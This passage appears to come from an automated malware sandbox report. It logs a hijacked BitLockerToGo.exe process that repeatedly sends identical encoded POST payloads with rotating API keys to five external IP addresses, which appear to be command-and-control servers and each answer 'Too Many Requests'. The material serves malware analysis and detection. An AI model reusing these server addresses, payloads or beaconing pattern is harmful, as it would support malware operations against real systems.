                                          Oct 18, 2024 14:03:42.212692976 CEST804981593.185.159.253192.168.2.4
                                          Oct 18, 2024 14:03:42.212733030 CEST4982180192.168.2.491.212.166.91
                                          Oct 18, 2024 14:03:42.212742090 CEST4981580192.168.2.493.185.159.253
                                          Oct 18, 2024 14:03:42.213545084 CEST804980946.8.236.61192.168.2.4
                                          Oct 18, 2024 14:03:42.213557959 CEST804980346.8.232.106192.168.2.4
                                          Oct 18, 2024 14:03:42.213586092 CEST4980980192.168.2.446.8.236.61
                                          Oct 18, 2024 14:03:42.213613033 CEST4980380192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.209561110 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.214560032 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:12.214721918 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.215013027 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:12.219790936 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:13.072570086 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:13.126501083 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:13.243434906 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.248312950 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:13.248421907 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.290038109 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:13.295042038 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:14.116594076 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:14.118247032 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.123100996 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.123290062 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.123522043 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:14.128346920 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.170701981 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:14.984178066 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:14.985927105 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.990986109 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:14.991105080 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.991453886 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:14.996853113 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:15.038647890 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:15.922864914 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:15.960284948 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.965204954 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:15.965285063 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.966000080 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:15.970937014 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:15.982233047 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.959208965 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:16.959577084 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:16.959614038 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.959657907 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:16.959742069 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:16.959784031 CEST5000080192.168.2.446.8.232.106
                                          Oct 18, 2024 14:04:16.964977026 CEST8050021188.130.206.243192.168.2.4
                                          Oct 18, 2024 14:04:16.965081930 CEST5002180192.168.2.4188.130.206.243
                                          Oct 18, 2024 14:04:16.965904951 CEST805001791.212.166.91192.168.2.4
                                          Oct 18, 2024 14:04:16.965970993 CEST805001193.185.159.253192.168.2.4
                                          Oct 18, 2024 14:04:16.965969086 CEST5001780192.168.2.491.212.166.91
                                          Oct 18, 2024 14:04:16.965985060 CEST805000546.8.236.61192.168.2.4
                                          Oct 18, 2024 14:04:16.965998888 CEST805000046.8.232.106192.168.2.4
                                          Oct 18, 2024 14:04:16.966048956 CEST5001180192.168.2.493.185.159.253
                                          Oct 18, 2024 14:04:16.966059923 CEST5000580192.168.2.446.8.236.61
                                          Oct 18, 2024 14:04:16.966078043 CEST5000080192.168.2.446.8.232.106
                                          • 46.8.232.106
                                          • 46.8.236.61
                                          • 93.185.159.253
                                          • 91.212.166.91
                                          • 188.130.206.243
                                          Session ID: 0 | Source IP: 192.168.2.4 | Source Port: 49741 | Destination IP: 46.8.232.106 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:03.007747889 CEST | 298 | OUT | POST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: X2qB4QsF
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:03.851664066 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:03 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 1 | Source IP: 192.168.2.4 | Source Port: 49742 | Destination IP: 46.8.236.61 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:03.859328032 CEST | 297 | OUT | POST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: Gr3WMKTB
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:04.725080967 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:04 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 2 | Source IP: 192.168.2.4 | Source Port: 49743 | Destination IP: 93.185.159.253 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:04.732546091 CEST | 300 | OUT | POST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: bxqWLRuT
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:05.599980116 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:05 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 3 | Source IP: 192.168.2.4 | Source Port: 49744 | Destination IP: 91.212.166.91 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:05.606853962 CEST | 299 | OUT | POST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: wVwZRp3X
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:06.515130997 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:06 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 4 | Source IP: 192.168.2.4 | Source Port: 49745 | Destination IP: 188.130.206.243 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:06.521856070 CEST | 301 | OUT | POST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: M3s2yoni
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:07.374522924 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:07 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 5 | Source IP: 192.168.2.4 | Source Port: 49803 | Destination IP: 46.8.232.106 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:37.382446051 CEST | 298 | OUT | POST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: SUn6zhye
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:38.261029005 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:38 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 6 | Source IP: 192.168.2.4 | Source Port: 49809 | Destination IP: 46.8.236.61 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:38.267755985 CEST | 297 | OUT | POST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: 7gRihgA6
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:39.119452000 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:38 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 7 | Source IP: 192.168.2.4 | Source Port: 49815 | Destination IP: 93.185.159.253 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:39.126230001 CEST | 300 | OUT | POST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: sCmLPLmp
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:40.064974070 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:39 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 8 | Source IP: 192.168.2.4 | Source Port: 49821 | Destination IP: 91.212.166.91 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:40.071691990 CEST | 299 | OUT | POST / HTTP/1.1
                                          Host: 91.212.166.91
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: qlZCu38t
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:41.001111984 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:40 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID: 9 | Source IP: 192.168.2.4 | Source Port: 49827 | Destination IP: 188.130.206.243 | Destination Port: 80 | PID: 7652 | Process: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:03:41.008100986 CEST | 301 | OUT | POST / HTTP/1.1
                                          Host: 188.130.206.243
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: zbNBhDll
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:03:42.205930948 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:03:42 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          10 | 192.168.2.4 | 50000 | 46.8.232.106 | 80 | 7652 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:04:12.215013027 CEST | 298 | OUT | POST / HTTP/1.1
                                          Host: 46.8.232.106
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: pXRqnRHQ
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:13.072570086 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:12 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          11 | 192.168.2.4 | 50005 | 46.8.236.61 | 80 | 7652 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:04:13.290038109 CEST | 297 | OUT | POST / HTTP/1.1
                                          Host: 46.8.236.61
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: ieY9bnDS
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:14.116594076 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:13 GMT
                                          Content-Length: 18
                                          Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                          Data Ascii: Too many requests


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          12 | 192.168.2.4 | 50011 | 93.185.159.253 | 80 | 7652 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          Oct 18, 2024 14:04:14.123522043 CEST | 300 | OUT | POST / HTTP/1.1
                                          Host: 93.185.159.253
                                          User-Agent: Go-http-client/1.1
                                          Content-Length: 162
                                          X-Api-Key: GRI3r7kS
                                          Accept-Encoding: gzip
                                          Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 04 0d 38 08 54 50 56 07 2c 26 03 33 08 54 2c 1e 31 10 08 14 5f 38 13 1f 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 3a 1a 0b 2e 07 23 12 1d 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 2e 39 25 2d 24 2b 52 31 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 50 07 17 48 02 23 34 5c 5f 17 28 45 4f 4d 03 02 5c 45 59 4d 0f 50 5d 05 06 0e 0c 53 0d 53 56 5e 58 04 0c 04 02 5b 0d 52 59 05 51 5a 0a 05 59 04 52 0c 0a 5e 4b 1a
                                          Data Ascii: M*L\K8TPV,&3T,1_8EOM:DSE:.#LJK9AUL.9%-$+R1EOM9L\KWPH#4\_(EOM\EYMP]SSV^X[RYQZYR^K
                                          Oct 18, 2024 14:04:14.984178066 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                          Content-Type: text/plain; charset=utf-8
                                          X-Content-Type-Options: nosniff
                                          Date: Fri, 18 Oct 2024 12:04:14 GMT
                                          Content-Length: 18
